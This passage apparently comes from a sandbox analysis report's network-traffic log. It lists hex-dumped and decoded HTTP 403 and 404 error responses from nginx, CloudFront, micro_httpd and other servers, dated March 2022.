6f 72 3a 20 23 46 33 39 36 30 42 3b 0a 20 20 20 20 20 20 20 20 09 73 63 72 6f 6c 6c 62 61 72 2d 44 61 72 6b 53 68 61 64 6f 77 2d 43 6f 6c 6f 72 3a 20 23 30 30 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 46 46 46 46 46 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 61 20 7b 20 63 6f 6c 6f 72 3a 23 30 32 31 66 32 35 3b 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 7d 0a 20 20 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 09 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0a 20 20 20 20 20 20 20 20 09 63 6f 6c 6f 72 3a 20 23 46 42 39 38 30 32 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 20 75 72 6c 28 73 79 73 5f 63 70 61 6e 65 6c 2f 69 6d 61 67 65 73 2f 62 6f 74 74 6f 6d 62 6f 64 79 2e 6a 70 67 29 3b 0a 20 20 20 20 20 20 20 20 09 62 61 63 6b 67 72 6f 75 6e 64 2d 72 65 70 65 61 74 3a 20 72 65 70 65 61 74 2d 78 3b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 3a 35 70 78 20 30 20 31 30 70 78 20 31 35 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 30 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 23 62 6f 64 79 2d 63 6f 6e 74 65 6e 74 20 70 20 7b 0a 20 20 20 20 20 20 20 20 09 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 35 70 78 3b 0a 20 20
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:07:55 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Mar 2022 19:07:57 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body bgcolor="white"><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.2Date: Mon, 21 Mar 2022 19:07:58 GMTContent-Type: text/htmlContent-Length: 169Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.2</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 0Date: Mon, 21 Mar 2022 19:08:23 GMTX-Frame-Options: sameoriginContent-Security-Policy: frame-ancestors 'self'
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:08 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:11 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cache, no-store, must-revalidate, max-age=0Pragma: no-cacheExpires: 0Date: Mon, 21 Mar 2022 15:08:15 GMTContent-Type: text/htmlConnection: Keep-AliveData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Mar 2022 19:08:16 GMTContent-Type: text/htmlContent-Length: 124Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 6f 70 73 21 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Oops! 403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:15 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:08:20 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 1017faf768f4e64d2ee1838ee3aff5d8.cloudfront.net (CloudFront)X-Amz-Cf-Pop: GRU3-C1X-Amz-Cf-Id: PrrFF9N9IN-GtHjp0VeLt0O_2kqPPak-v9hNYM8802HpyxLF5Rpv1g==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 50 72 72 46 46 39 4e 39 49 4e 2d 47 74 48 6a 70 30 56 65 4c 74 30 4f 5f 32 6b 71 50 50 61 6b 2d 76 39 68 4e 59 4d 38 38 30 32 48 70 79 78 4c 46 35 52 70 76 31 67 3d 3d 0a 3c 2f 50 52 45 3e 0a 3c
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:08:20 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 389c1a33068cb9de45215880c481189e.cloudfront.net (CloudFront)X-Amz-Cf-Pop: LAX50-C3X-Amz-Cf-Id: njXu-6KwEvMen2hoEUJ1HU6Y4S9jndt45v65MOdp2BUmTqkYimYpAA==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 4f 4e 54 45 4e 54 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 69 73 6f 2d 38 38 35 39 2d 31 22 3e 0a 3c 54 49 54 4c 45 3e 45 52 52 4f 52 3a 20 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 34 30 33 20 45 52 52 4f 52 3c 2f 48 31 3e 0a 3c 48 32 3e 54 68 65 20 72 65 71 75 65 73 74 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 73 61 74 69 73 66 69 65 64 2e 3c 2f 48 32 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 42 61 64 20 72 65 71 75 65 73 74 2e 0a 57 65 20 63 61 6e 27 74 20 63 6f 6e 6e 65 63 74 20 74 6f 20 74 68 65 20 73 65 72 76 65 72 20 66 6f 72 20 74 68 69 73 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 61 74 20 74 68 69 73 20 74 69 6d 65 2e 20 54 68 65 72 65 20 6d 69 67 68 74 20 62 65 20 74 6f 6f 20 6d 75 63 68 20 74 72 61 66 66 69 63 20 6f 72 20 61 20 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 65 72 72 6f 72 2e 20 54 72 79 20 61 67 61 69 6e 20 6c 61 74 65 72 2c 20 6f 72 20 63 6f 6e 74 61 63 74 20 74 68 65 20 61 70 70 20 6f 72 20 77 65 62 73 69 74 65 20 6f 77 6e 65 72 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 49 66 20 79 6f 75 20 70 72 6f 76 69 64 65 20 63 6f 6e 74 65 6e 74 20 74 6f 20 63 75 73 74 6f 6d 65 72 73 20 74 68 72 6f 75 67 68 20 43 6c 6f 75 64 46 72 6f 6e 74 2c 20 79 6f 75 20 63 61 6e 20 66 69 6e 64 20 73 74 65 70 73 20 74 6f 20 74 72 6f 75 62 6c 65 73 68 6f 6f 74 20 61 6e 64 20 68 65 6c 70 20 70 72 65 76 65 6e 74 20 74 68 69 73 20 65 72 72 6f 72 20 62 79 20 72 65 76 69 65 77 69 6e 67 20 74 68 65 20 43 6c 6f 75 64 46 72 6f 6e 74 20 64 6f 63 75 6d 65 6e 74 61 74 69 6f 6e 2e 0a 3c 42 52 20 63 6c 65 61 72 3d 22 61 6c 6c 22 3e 0a 3c 48 52 20 6e 6f 73 68 61 64 65 20 73 69 7a 65 3d 22 31 70 78 22 3e 0a 3c 50 52 45 3e 0a 47 65 6e 65 72 61 74 65 64 20 62 79 20 63 6c 6f 75 64 66 72 6f 6e 74 20 28 43 6c 6f 75 64 46 72 6f 6e 74 29 0a 52 65 71 75 65 73 74 20 49 44 3a 20 6e 6a 58 75 2d 36 4b 77 45 76 4d 65 6e 32 68 6f 45 55 4a 31 48 55 36 59 34 53 39 6a 6e 64 74 34 35 76 36 35 4d 4f 64 70 32 42 55 6d 54 71 6b 59 69 6d 59 70 41 41 3d 3d 0a 3c 2f 50 52 45 3e 0a 3
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: micro_httpdCache-Control: no-cacheDate: Thu, 01 Jan 1970 05:45:07 GMTContent-Type: text/htmlConnection: closeData Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 3c 2f 48 45 41 44 3e 0a 3c 42 4f 44 59 20 42 47 43 4f 4c 4f 52 3d 22 23 63 63 39 39 39 39 22 3e 3c 48 34 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 48 34 3e 0a 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 0a 3c 48 52 3e 0a 3c 41 44 44 52 45 53 53 3e 3c 41 20 48 52 45 46 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 61 63 6d 65 2e 63 6f 6d 2f 73 6f 66 74 77 61 72 65 2f 6d 69 63 72 6f 5f 68 74 74 70 64 2f 22 3e 6d 69 63 72 6f 5f 68 74 74 70 64 3c 2f 41 3e 3c 2f 41 44 44 52 45 53 53 3e 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a Data Ascii: <HTML><HEAD><TITLE>404 Not Found</TITLE></HEAD><BODY BGCOLOR="#cc9999"><H4>404 Not Found</H4>File not found.<HR><ADDRESS><A HREF="http://www.acme.com/software/micro_httpd/">micro_httpd</A></ADDRESS></BODY></HTML>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 21 Mar 2022 19:08:21 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Mon, 21 Mar 2022 19:08:22 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 21 Mar 2022 19:08:28 GMTContent-Type: text/htmlContent-Length: 146Connection: keep-aliveX-Trace: 403-1647889708498-0-0-0-0-0Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Mon, 21 Mar 2022 19:08:25 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: awselb/2.0Date: Mon, 21 Mar 2022 19:08:28 GMTContent-Type: text/plain; charset=utf-8Content-Length: 0Connection: keep-alive
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 21 Mar 2022 19:08:28 GMTContent-Type: text/htmlContent-Length: 162Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 21 Mar 2022 19:08:33 GMTContent-Type: application/json; charset=utf-8Connection: keep-aliveContent-Length: 48X-Kong-Response-Latency: 0Server: kong/2.2.1Data Raw: 7b 22 6d 65 73 73 61 67 65 22 3a 22 6e 6f 20 52 6f 75 74 65 20 6d 61 74 63 68 65 64 20 77 69 74 68 20 74 68 6f 73 65 20 76 61 6c 75 65 73 22 7d Data Ascii: {"message":"no Route matched with those values"}
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginx/1.20.1Date: Mon, 21 Mar 2022 19:08:33 GMTContent-Type: text/htmlContent-Length: 153Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx/1.20.1</center></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: CloudFrontDate: Mon, 21 Mar 2022 19:08:35 GMTContent-Type: text/htmlContent-Length: 915Connection: keep-aliveX-Cache: Error from cloudfrontVia: 1.1 c83536c4e12f4a229fa27266fc5fdd56.cloudfront.net (CloudFront)X-Amz-Cf-Pop: YUL62-C2X-Amz-Cf-Id: tgF4Cqsc2aC114MJjJeniFUvc6xW3uSqUfsGctF4_r5nFLChdcdvuQ==Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 6c 6f 6f 73 65 2e 64 74 64 22 3e 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 4d 